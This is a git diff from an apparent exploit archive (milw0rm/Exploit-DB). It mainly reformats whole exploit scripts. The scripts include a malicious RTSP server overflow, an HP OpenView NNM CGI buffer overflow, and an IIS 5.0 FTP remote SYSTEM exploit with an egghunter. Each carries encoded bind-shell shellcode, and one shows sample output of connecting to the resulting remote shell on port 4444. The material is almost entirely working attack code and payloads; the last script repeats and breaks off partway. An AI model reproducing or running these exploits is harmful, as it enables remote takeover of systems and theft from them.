+# This is indeed an evil exploit - muhaha. +########################################################################## + +from socket import * + +header = ( +'RTSP/1.0 200 OK\r\n' +'CSeq: 1\r\n' +'Date: 0x00 :P\r\n' +'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' +'Content-Type: %s\r\n' # <-- overflow +'Content-Length: %d\r\n' +'\r\n') + +body = ( +'v=0\r\n' +'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' +'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' +'i=1.mp3\r\n' +'t=0 0\r\n' +'a=tool:ciamciaramcia\r\n' +'a=type:broadcast\r\n' +'a=control:*\r\n' +'a=range:npt=0-213.077\r\n' +'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' +'a=x-qt-text-inf:1.mp3\r\n' +'m=audio 0 RTP/AVP 14\r\n' +'c=IN IP4 0.0.0.0\r\n' +'a=control:track1\r\n' +) + +# ExitProcess shellcode will kill browser, but keep the shell open + +shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41" +"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61" +"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53" +"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e" +"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46" +"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50" +"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b" +"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b" +"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69" +"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36" +"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44" +"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56" +"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74" 
+"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53" +"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a" +"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71" +"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78" +"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f" +"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32" +"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c" +"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33" +"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51" +"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51" +"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41" +"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e" +"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39" +"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b" +"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e" +"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38" +"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31" +"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46" +"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30" +"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73" +"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e" +"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32" +"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30" +"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e" +"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58" +"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41" +"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b" +"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b" +"\x4f\x48\x56\x69\x6f\x6a\x70\x42") + +tmp = "A" * 987 +tmp +="\xeb\x20\x90\x90" # short jump 
for 7.2 +tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3 +tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3 +tmp += "\x90" * 92 +tmp += shellcode +tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions. + +header %= (tmp, len(body)) +evil = header + body + +s = socket(AF_INET, SOCK_STREAM) +s.bind(("0.0.0.0", 554)) +s.listen(1) +print "[+] Listening on [RTSP] 554" +c, addr = s.accept() +print "[+] Connection accepted from: %s" % (addr[0]) +c.recv(1024) +c.send(evil) +raw_input("[+] Done, press enter to quit") +c.close() +s.close() + +# milw0rm.com [2007-11-26] diff --git a/platforms/windows/remote/4724.py b/platforms/windows/remote/4724.py index c394781ea..dbaa69b31 100755 --- a/platforms/windows/remote/4724.py +++ b/platforms/windows/remote/4724.py 
@@ -1,89 +1,89 @@ -#!/usr/bin/python -# HP OpenView Network Node Manager CGI Buffer Overflow -# Tested on NNM Release B.07.50 / Windows 2000 server SP4 -# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html -# Coded by Mati Aharoni -# muts|offensive-security|com -# http://www.offensive-security.com/0day/hpnnm.txt -# Notes: -# Vanilla stack based overflow -# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking -# the entry point and injecting Sleep just before exe execution. This gave me enough -# time to attach a debugger before program termination. If anyone knows how to properly -# debug this, please tell me about it - there *must* be a better way... -# -# bt tools # ./sploit 192.168.1.105 -# [+] Connecting to 192.168.1.105 -# [+] Sending Evil Buffer to NNM CGI -# [+] Payload Sent, ph33r. -# -# bt tools # nc -nv 192.168.1.105 4444 -# (UNKNOWN) [192.168.1.105] 4444 (krb524) open -# Microsoft Windows 2000 [Version 5.00.2195] -# (C) Copyright 1985-2000 Microsoft Corp. 
-# -# C:\Program Files\HP OpenView\www\cgi-bin> - -import socket -import os -import sys -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -print "[+] Connecting to "+sys.argv[1] -expl.connect ( ( sys.argv[1], 80 ) ) -print "[+] Sending Evil Buffer to NNM CGI\n" -buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" -buffer+="A"*5123 -buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4 -buffer+="\x90"*32 -# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ -buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68" -"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42" -"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50" -"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71" -"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c" -"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64" -"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55" -"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e" -"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a" -"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78" -"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54" -"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76" -"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50" -"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64" -"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63" -"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b" -"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70" -"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a" -"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c" -"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73" 
-"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c" -"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51" -"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62" -"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75" -"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51" -"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c" -"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b" -"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79" -"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f" -"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58" -"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33" -"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44" -"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54" -"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30" -"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c" -"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51" -"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33" -"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48" -"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a" -"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73" -"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b" -"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b" -"\x4f\x6b\x66\x79\x6f\x58\x50\x68") -buffer+="\r\n\r\n" - -expl.send (buffer) -expl.close() -print "[+] Payload Sent, ph33r." 
- -# milw0rm.com [2007-12-12] +#!/usr/bin/python +# HP OpenView Network Node Manager CGI Buffer Overflow +# Tested on NNM Release B.07.50 / Windows 2000 server SP4 +# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html +# Coded by Mati Aharoni +# muts|offensive-security|com +# http://www.offensive-security.com/0day/hpnnm.txt +# Notes: +# Vanilla stack based overflow +# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking +# the entry point and injecting Sleep just before exe execution. This gave me enough +# time to attach a debugger before program termination. If anyone knows how to properly +# debug this, please tell me about it - there *must* be a better way... +# +# bt tools # ./sploit 192.168.1.105 +# [+] Connecting to 192.168.1.105 +# [+] Sending Evil Buffer to NNM CGI +# [+] Payload Sent, ph33r. +# +# bt tools # nc -nv 192.168.1.105 4444 +# (UNKNOWN) [192.168.1.105] 4444 (krb524) open +# Microsoft Windows 2000 [Version 5.00.2195] +# (C) Copyright 1985-2000 Microsoft Corp. 
+# +# C:\Program Files\HP OpenView\www\cgi-bin> + +import socket +import os +import sys +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +print "[+] Connecting to "+sys.argv[1] +expl.connect ( ( sys.argv[1], 80 ) ) +print "[+] Sending Evil Buffer to NNM CGI\n" +buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" +buffer+="A"*5123 +buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4 +buffer+="\x90"*32 +# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ +buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68" +"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42" +"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50" +"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71" +"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c" +"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64" +"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55" +"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e" +"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a" +"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78" +"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54" +"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76" +"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50" +"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64" +"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63" +"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b" +"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70" +"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a" +"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c" +"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73" 
+"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c" +"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51" +"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62" +"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75" +"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51" +"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c" +"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b" +"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79" +"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f" +"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58" +"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33" +"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44" +"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54" +"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30" +"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c" +"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51" +"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33" +"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48" +"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a" +"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73" +"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b" +"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b" +"\x4f\x6b\x66\x79\x6f\x58\x50\x68") +buffer+="\r\n\r\n" + +expl.send (buffer) +expl.close() +print "[+] Payload Sent, ph33r." + +# milw0rm.com [2007-12-12] diff --git a/platforms/windows/remote/663.py b/platforms/windows/remote/663.py index 06460d72e..ab32052ca 100755 --- a/platforms/windows/remote/663.py +++ b/platforms/windows/remote/663.py 
@@ -42,6 +42,6 @@ sleep(3) s.send('A001 SELECT ' + buffer+'\r\n') data = s.recv(1024) s.close() -print "\nDone! " - -# milw0rm.com [2004-11-29] +print "\nDone! " + +# milw0rm.com [2004-11-29] diff --git a/platforms/windows/remote/7410.htm b/platforms/windows/remote/7410.htm index 1ea23e76e..010c522b1 100755 --- a/platforms/windows/remote/7410.htm +++ b/platforms/windows/remote/7410.htm @@ -1,55 +1,55 @@ - - - - - - - - - -# milw0rm.com [2008-12-10] + + + + + + + + + +# milw0rm.com [2008-12-10] diff --git a/platforms/windows/remote/9559.pl b/platforms/windows/remote/9559.pl index ceacfdc4f..47c87ad56 100755 --- a/platforms/windows/remote/9559.pl +++ b/platforms/windows/remote/9559.pl 
@@ -1,144 +1,144 @@
-#!/usr/bin/perl
-# IIS 5.0 FTP Server / Remote SYSTEM exploit
-# Win2k SP4 targets
-# bug found & exploited by Kingcope, kcope2googlemail.com
-# Affects IIS6 with stack cookie protection
-# Modded by muts, additional egghunter added for secondary larger payload
-# Might take a minute or two for the egg to be found.
-# Opens bind shell on port 4444
-
-# http://www.offensive-security.com/0day/msftp.pl.txt
-
-use IO::Socket;
-$|=1;
-$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
-"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
-"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
-"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
-"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
-"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
-"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
-"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
-"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
-# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
-
-$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
-"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
-"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
-"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
-"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
-"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
-"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
-"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
-"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
-"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
-"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
-"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
-"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
-"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
-"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
-"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
-"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
-"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
-"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
-"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
-"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
-"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
-"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
-"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
-"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
-
-
-print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
-if ($#ARGV ne 1) {
-print "usage: iiz5.pl \n";
-exit(0);
-}
-srand(time());
-$port = int(rand(31337-1022)) + 1025;
-$locip = $ARGV[1];
-$locip =~ s/\./,/gi;
-if (fork()) {
-$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
- PeerPort => '21',
- Proto => 'tcp');
-$patch = "\x7E\xF1\xFA\x7F";
-$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
-
-$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
-# top address of stack frame where shellcode resides, is hardcoded inside this block
-$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
- ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
-
-# attack buffer
-$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
- ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
- "HHHHIIII".
-$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
-$x = <$sock>;
-print $x;
-print $sock "USER anonimoos\r\n";
-$x = <$sock>;
-print $x;
-print $sock "PASS $shell\r\n";
-$x = <$sock>;
-print $x;
-print $sock "USER anonimoos\r\n";
-$x = <$sock>;
-print $x;
-print $sock "PASS $shell\r\n";
-$x = <$sock>;
-print $x;
-
-print $sock "USER anonymous\r\n";
-$x = <$sock>;
-print $x;
-print $sock "PASS anonymous\r\n";
-$x = <$sock>;
-print $x;
-print $sock "MKD w00t$port\r\n";
-$x = <$sock>;
-print $x;
-print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
-$x = <$sock>;
-print $x;
-print $sock "SITE $v\r\n";
-$x = <$sock>;
-print $x;
-print $sock "SITE $v\r\n";
-$x = <$sock>;
-print $x;
-print $sock "SITE $v\r\n";
-$x = <$sock>;
-print $x;
-print $sock "SITE $v\r\n";
-$x = <$sock>;
-print $x;
-print $sock "CWD w00t$port\r\n";
-$x = <$sock>;
-print $x;
-print $sock "MKD CCC". "$c\r\n";
-$x = <$sock>;
-print $x;
-print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
-$x = <$sock>;
-print $x;
-# TRIGGER
-print $sock "NLST $c*/../C*/\r\n";
-$x = <$sock>;
-print $x;
-while (1) {}
-} else {
-my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
-die "Could not create socket: $!\n" unless $servsock;
-my $new_sock = $servsock->accept();
-while(<$new_sock>) {
-print $_;
-}
-close($servsock);
-}
-#Cheerio,
-#
-#Kingcope
-
-# milw0rm.com [2009-09-01]
+#!/usr/bin/perl
+# IIS 5.0 FTP Server / Remote SYSTEM exploit
+# Win2k SP4 targets
+# bug found & exploited by Kingcope, kcope2googlemail.com
+# Affects IIS6 with stack cookie protection
+# Modded by muts, additional egghunter added for secondary larger payload
+# Might take a minute or two for the egg to be found.
+# Opens bind shell on port 4444
+
+# http://www.offensive-security.com/0day/msftp.pl.txt
+
+use IO::Socket;
+$|=1;
+$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
+"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
+"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
+"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
+"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
+"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
+# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
+
+$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
